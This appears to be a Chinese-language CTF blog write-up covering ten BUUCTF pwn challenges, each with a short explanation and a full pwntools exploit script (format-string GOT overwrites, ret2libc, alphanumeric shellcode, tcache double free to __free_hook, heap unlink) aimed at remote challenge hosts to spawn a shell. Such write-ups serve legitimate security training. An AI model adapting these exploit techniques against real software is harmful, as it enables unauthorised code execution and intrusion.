BUUCTF-pwn(11)

mrctf2020_easy_equation

简单的栈溢出漏洞与格式化字符串漏洞并存!此处采用栈溢出漏洞!
在这里插入图片描述


axb_2019_fmt64

经典循环格式化字符串64位漏洞!
在这里插入图片描述
唯一需要注意的地方:pwntools的fmtstr_payload无法成功获取权限!需要手动计算字节进行攻击!

在这里插入图片描述

from elftools.construct.macros import Padding
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='amd64')

# Remote challenge instance; the commented-out process() line is the local alternative.
binary = './axb_2019_fmt64'
r = remote('node4.buuoj.cn',29901)
#r = process(binary)
elf = ELF(binary)
# GOT slots read from the binary. printf_got is not referenced again in this
# script; read_got is the leak target and strlen_got the write target below.
printf_got = elf.got['printf']
strlen_got = elf.got['strlen']
read_got = elf.got['read']

def leak(payload):
    """Send *payload* to the remote end and hand back the raw reply."""
    r.send(payload)
    reply = r.recv()
    return reply

r.recvuntil("Please tell me:")
# Earlier probing for the format-string offset, kept by the author but disabled:
# a '%p' ladder and the FmtStr auto-detection. The manual `offset = 8` below is
# recorded but never used; the specifiers further down are hand-indexed.
#leak(b'aaaaaaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'+p64(0)+b'cccccccc')
'''fmt = FmtStr(leak,numbwritten=9)
offset = fmt.offset'''
offset = 8
#gdb.attach(r)
# Leak: 16 bytes of format text, 8 bytes of padding, then read_got, which
# '%11$s' dereferences (offset 8 covers the first 8 bytes, so read_got is at 11).
r.send(b'aaaaaaaa.%11$sdd'+p64(0)+p64(read_got))
r.recvuntil(b"aaaaaaaa.")
# A 64-bit libc pointer prints as 6 bytes; zero-extend to 8 before unpacking.
read_addr = u64(r.recv(6).ljust(8,b'\x00'))
# Resolve libc from the leaked read address and derive the symbols used below.
libc = LibcSearcher('read',read_addr)
libc_base = read_addr-libc.dump('read')
system = libc_base+libc.dump('system')
# sh is computed but not referenced again in this script.
sh = libc_base+libc.dump('str_bin_sh')
log.info("read_addr -> "+hex(read_addr))
log.info("system -> "+hex(system))
# The pwntools helper is disabled (see the prose above); the write is built by hand.
#payload = fmtstr_payload(6,{strlen_got:system},numbwritten=9,write_size='byte')
# 'high' is byte 2 of system, 'low' its low 16 bits.
high = (system & 0xff0000)//0x10000
low = (system & 0xffff)
print(high,low)
# '%<high-9>c%12$hhn' writes one byte through the pointer at position 12, then
# '%<low-high>c%13$hn' writes two bytes through position 13. The 9 presumably
# accounts for bytes printed before this string (the disabled calls use
# numbwritten=9) — confirm. NOTE(review): the second width is low-high, so this
# only works when low > high; a negative width would not give the intended count.
payload = '%'+str(high-9)+'c%12$hhn'+'%'+str(low-high)+'c%13$hn'
# Pad the format text to 32 bytes so the two addresses land at positions 12
# (strlen_got+2, the single byte) and 13 (strlen_got, the two low bytes).
payload = bytes(payload,encoding='utf-8')+b'c'*(32-len(payload))+p64(strlen_got+2)+p64(strlen_got)
print(payload)
r.send(payload)
r.recvuntil("Please tell me:")
# strlen's GOT entry now points at system; presumably the binary calls strlen
# on this next input — confirm.
r.send(b';/bin/sh\x00')

r.interactive()

x_ctf_b0verfl0w

无保护的栈溢出漏洞!
在这里插入图片描述

from re import L
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='i386')

binary = './b0verfl0w'
r = remote('node4.buuoj.cn',29177)
#r = process(binary)
elf = ELF(binary)
# Addresses taken straight from the binary (the prose says it has no protections):
# main is the return target after the leak, puts@plt/puts@got provide the leak.
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

r.recvuntil("What's your name?\n")
# Stage 1 (32-bit ret2libc): 0x24 bytes reach the saved return address, then
# puts@plt, its return address (main, to get a second overflow) and its
# argument puts@got.
payload = b'a'*0x24+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
# Assumes the leaked pointer's top byte is 0xf7 (presumably the libc mapping
# on the target — confirm); the 4 bytes ending there are the address.
puts_addr = u32(r.recvuntil('\xf7')[-4:])
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
# Stage 2: same layout, now calling system with the "/bin/sh" string and main as return.
payload2 = b'a'*0x24+p32(system)+p32(main)+p32(sh)
r.sendline(payload2)

r.interactive()

suctf_2018_basic_pwn

同样栈溢出漏洞!
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './SUCTF_2018_basic_pwn'
r = remote('node4.buuoj.cn',27378)
#r = process(binary)
elf = ELF(binary)
# Hard-coded address inside the binary; the author's name for it suggests it
# reaches a shell, but what it points to is not shown on this page.
binsh = 0x0401157
# 0x118 bytes of padding reach the saved return address, which is replaced by
# binsh (the prose classifies this as a plain stack overflow).
payload = b'a'*0x118+p64(binsh)
r.sendline(payload)

r.interactive()

mrctf2020_shellcode_revenge

此时IDA无法将main函数反编译成伪C代码,故采用Cutter工具进行反编译!
可以发现没有开启NX保护措施,但是却不存在栈溢出漏洞。
在这里插入图片描述
即开始排查输入是否允许数字和字母以外的字符。故查询资料,发现alpha3可以满足我们的条件!

git clone https://github.com/TaQini/alpha3.git

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './mrctf2020_shellcode_revenge'
r = remote('node4.buuoj.cn',25264)
#r = process(binary)
elf = ELF(binary)

# The author's original flow (wait for the prompt, send a `shellcode` variable)
# is disabled; the alphanumeric string below is sent as-is instead.
'''r.recvuntil("Show me your magic!\n")
r.sendline(shellcode)'''
# Purely alphanumeric payload; the prose attributes its encoding to alpha3.
# It is sent without waiting for the prompt, as a str (pwntools encodes it).
r.send("Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")

r.interactive()

ciscn_2019_es_1

分析主要函数
在这里插入图片描述
Allocate申请函数!
在这里插入图片描述
Show打印函数
在这里插入图片描述
Free释放函数,存在UAF漏洞!
在这里插入图片描述
本题较为简单,libc为2.27,存在tcache,且有UAF漏洞,故可以double free,进而达到任意地址写。不过开启了满保护,即无法写入got表,故可以写入malloc_hook,但经过实践发现malloc_hook存放one_gadget无法获取权限,从而思考realloc_hook的方法,但依然不行,故写入free_hook中!

在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './ciscn_2019_es_1'
r = remote('node4.buuoj.cn',26708)
#r = process(binary)
elf = ELF(binary)
# Challenge-provided libc (2.27 per the prose); symbol offsets are read from
# this file rather than looked up with LibcSearcher.
libc = ELF('./libc-2.27.so')
def Allocate(size=0x18,payload='\n'):
    """Menu option 1: create an entry with a *size*-byte name set to *payload*.

    The second field ("compary call") is always filled with a NUL-terminated
    /bin/sh string.
    """
    line_answers = (
        ("choice:", '1'),
        ("Please input the size of compary's name", str(size)),
    )
    for prompt, answer in line_answers:
        r.sendlineafter(prompt, answer)
    r.sendafter("please input name:", payload)
    r.sendafter("please input compary call:", b'/bin/sh\x00')

def Show(index):
    """Menu option 2: print the entry stored at *index*."""
    idx = str(index)
    r.sendlineafter("choice:", '2')
    r.sendlineafter("Please input the index:", idx)

def Free(index):
    """Menu option 3: release the entry stored at *index*."""
    idx = str(index)
    r.sendlineafter("choice:", '3')
    r.sendlineafter("Please input the index:", idx)


# Entries are numbered in allocation order (author's trailing comments).
Allocate(0x410)#0
Allocate(0x60)#1
Allocate()#2

# Free entry 1 twice (the double free the prose describes), then entry 0.
Free(1)
Free(1)#double free
Free(0)
# Show the freed entry 0: its first 8 bytes now hold a main_arena pointer
# (presumably the 0x410 request is above the tcache limit and went to the
# unsorted bin — confirm). 6 bytes ending in 0x7f are the address; the -96 is
# the author's adjustment to main_arena itself.
Show(0)
main_arena = u64(r.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-96
# main_arena sits 0x10 past __malloc_hook in this libc; the trailing comments
# are the author's raw offsets.
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']#-0x3EBC40
# realloc is computed but not referenced again (the prose says the
# realloc_hook route did not work).
realloc = libc_base+libc.symbols['__libc_realloc']#+0x98C30
free = libc_base+libc.symbols['__free_hook']#+0x3ED8E8
# one_gadget candidate offsets; only one[4] (same value as one[1]) is used.
one = [0x4f2c5,0x4f322,0x10a38c,0x4f2c5,0x4f322,0x10a38c]
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
log.info("free_hook -> "+hex(free))
# Through the double-freed 0x60 chunk: the first allocation gets it back and
# writes __free_hook into its first 8 bytes (the tcache next pointer), the
# second gets the same chunk again, and the third is served __free_hook
# itself, where the gadget address is written.
Allocate(0x60,p64(free))#3
Allocate(0x60,p64(free))#4
Allocate(0x60,p64(one[4]+libc_base))#5

#gdb.attach(r)
#r.sendlineafter("choice:",'1')
# Any free() now goes through the hook.
Free(2)

r.interactive()

picoctf_2018_leak_me

在这里插入图片描述
简单的泄露!
在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='i386')

binary = './PicoCTF_2018_leak-me'
r = remote("node4.buuoj.cn",29362)
#r = process(binary)
elf = ELF(binary)

# The commented-out alternative fills the name buffer so that the following
# password is presumably echoed back (the leak in the title); this run skips
# that and sends the already-known password directly.
name = 'njh'#b'a'*0xf8+b'c'*0x8
r.sendlineafter("What is your name?",name)
#r.recvuntil(b"ccccccc,")
#passwd = r.recvline()[:-1]
#r.recvuntil("Please Enter the Password.\n")
# Short pause instead of waiting for the password prompt (that recvuntil is disabled).
sleep(0.1)
r.sendline(b'a_reAllY_s3cuRe_p4s$word_f85406')

r.interactive()

inndy_echo

简单的格式化字符串漏洞,且为32位!直接使用pwntools集成格式化自动工具即可!
在这里插入图片描述
在这里插入图片描述

from re import L
from pwn import *
context(log_level='debug',os='linux',arch='i386')

binary = './echo'
r = remote('node4.buuoj.cn',28025)
#r = process(binary)
elf = ELF(binary)
# The binary carries its own system symbol, so no libc leak is needed;
# printf's GOT entry is the overwrite target.
printf_got = elf.got['printf']
system = elf.symbols['system']
def leak(payload):
    """Send *payload* as one line and return the raw response (callback for FmtStr)."""
    r.sendline(payload)
    data = r.recv()
    return data

# Let pwntools find the format-string offset by probing through leak();
# the author observed 7.
fmt = FmtStr(leak)
offset = fmt.offset#7
log.warn("offset -> "+str(offset))
# Auto-generated write of system over printf@got.
payload = fmtstr_payload(offset,{printf_got:system})
r.sendline(payload)
sleep(0.1)
# The next echoed line is passed to printf, which now resolves to system.
r.sendline(b'/bin/sh\x00')

r.interactive()

hitcontraining_unlink

分析主要函数!
在这里插入图片描述
Allocate申请函数,读入内容时最后一位设置成了\x00,存在截断
在这里插入图片描述
Show打印函数,遇到\x00结束
在这里插入图片描述
Edit编辑函数,存在堆溢出漏洞!
在这里插入图片描述
Free释放函数,不存在UAF等漏洞!
在这里插入图片描述
本题较为简单,题目名为Unlink,故采取Unlink手法进行攻击(存在bss段全局变量),便可以得到任意地址写!本题采用覆写free_got表的方法进行,但需要注意free_got与puts_got相邻,截断会破坏puts_got,需注意不能破坏puts_got,否则无法获取权限!

在这里插入图片描述

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './bamboobox'
r = remote('node4.buuoj.cn',26559)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc.so')
free_got = elf.got['free']
# malloc_got is not referenced again in this script.
malloc_got = elf.got['malloc']
# Global (bss) address used as the unlink target; presumably the item pointer
# array the prose mentions — confirm.
bss_addr = 0x06020C8
def Allocate(size=0x18,payload='\n'):
    """Menu option 2: add an item whose name buffer is *size* bytes, filled with *payload*."""
    length = str(size)
    r.sendlineafter("Your choice:", '2')
    r.sendlineafter("Please enter the length of item name:", length)
    r.sendafter("Please enter the name of item:", payload)

def Show():
    """Menu option 1: list every item."""
    choice = '1'
    r.sendlineafter("Your choice:", choice)

def Edit(index,payload):
    """Menu option 3: replace the name of item *index* with *payload*.

    The length sent to the program is exactly len(payload).
    """
    line_answers = (
        ("Your choice:", '3'),
        ("Please enter the index of item:", str(index)),
        ("Please enter the length of item name:", str(len(payload))),
    )
    for prompt, answer in line_answers:
        r.sendlineafter(prompt, answer)
    r.sendafter("Please enter the new name of the item:", payload)

def Free(index):
    """Menu option 4: remove the item at *index*."""
    idx = str(index)
    r.sendlineafter("Your choice:", '4')
    r.sendlineafter("Please enter the index of item:", idx)

def Exit():
    """Menu option 5: leave the program."""
    choice = '5'
    r.sendlineafter("Your choice:", choice)


# Items are numbered in allocation order (author's trailing comments).
Allocate(0x80)#0
Allocate()#1
Allocate(0x80)#2
Allocate()#3
Allocate(0x18,b'/bin/sh\x00')#4

# Fake chunk inside item 0 whose fd/bk are chosen so the unlink check
# (fd->bk == bk->fd == the pointer stored at target) passes.
target = bss_addr
fd = target-0x18
bk = target-0x10
Edit(0,p64(0)+p64(0xa1)+p64(fd)+p64(bk))
# Overflow from item 1 into item 2's header: prev_size 0xa0 points back at the
# fake chunk and size 0x90 clears PREV_INUSE, so freeing 2 consolidates backwards.
Edit(1,b'a'*0x10+p64(0xa0)+p64(0x90))
Free(2)#Unlink

# Carve 0x70 out of the merged free chunk; presumably the remainder's arena
# pointers now sit where item 1's data is, so showing the list leaks a
# main_arena pointer from entry "1 : " (-88 is the author's adjustment).
Allocate(0x70)#2
Show()
r.recvuntil("1 : ")
main_arenea = u64(r.recv(6).ljust(8,b'\x00'))-88
# Trailing comments are the author's raw offsets for this libc.
libc_base = main_arenea-0x10-libc.symbols['__malloc_hook']#-0x3C3B20
system = libc_base+libc.symbols['system']#+0x45380
puts = libc_base+libc.symbols['puts']#+0x6F5D0
log.info("main_arena -> "+hex(main_arenea))
log.warn("libc_base -> "+hex(libc_base))

# one_gadget offsets kept by the author; not used in this run.
one = [0x45206,0x4525a,0xef9f4,0xf0897]
# After the unlink, item 0's pointer presumably points at target-0x18, so
# editing item 0 rewrites the global array: item 0 -> target, item 1 -> free@got.
Edit(0,b'a'*0x18+p64(target)+b'a'*8+p64(free_got))

#gdb.attach(r)
# Write system over free@got and re-write the adjacent puts@got with its own
# value (the prose notes the two neighbour each other and puts must survive).
Edit(1,p64(system)+p64(puts))
# free(item 4) now resolves to system on the "/bin/sh" string.
Free(4)

r.interactive()

axb_2019_brop64

简单64位栈溢出漏洞,ret2libc!
在这里插入图片描述

from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='amd64')

binary = './axb_2019_brop64'
r = remote('node4.buuoj.cn',26284)
#r = process(binary)
elf = ELF(binary)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# Hard-coded addresses found by the author: presumably a `pop rdi; ret` gadget
# and the program's entry point (used to restart after the leak) — confirm.
pop_rdi_ret = 0x0400963
start = 0x04006E0

r.recvuntil("Please tell me:")
# Stage 1 ROP: 0xd8 bytes reach the saved return address, then
# puts(puts@got) followed by a jump to start so the overflow can be reused.
payload = b'a'*0xd8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
r.sendline(payload)
# puts prints the 6 significant bytes of the pointer and a newline; take the
# 6 bytes before the '\n' and zero-extend.
puts_addr = u64(r.recvuntil('\n')[-7:-1].ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.warn("puts_addr -> "+hex(puts_addr))

# Stage 2: same layout, now system("/bin/sh"); sent without waiting for the prompt.
payload2 = b'a'*0xd8+p64(pop_rdi_ret)+p64(sh)+p64(system)+p64(start)
r.sendline(payload2)


r.interactive()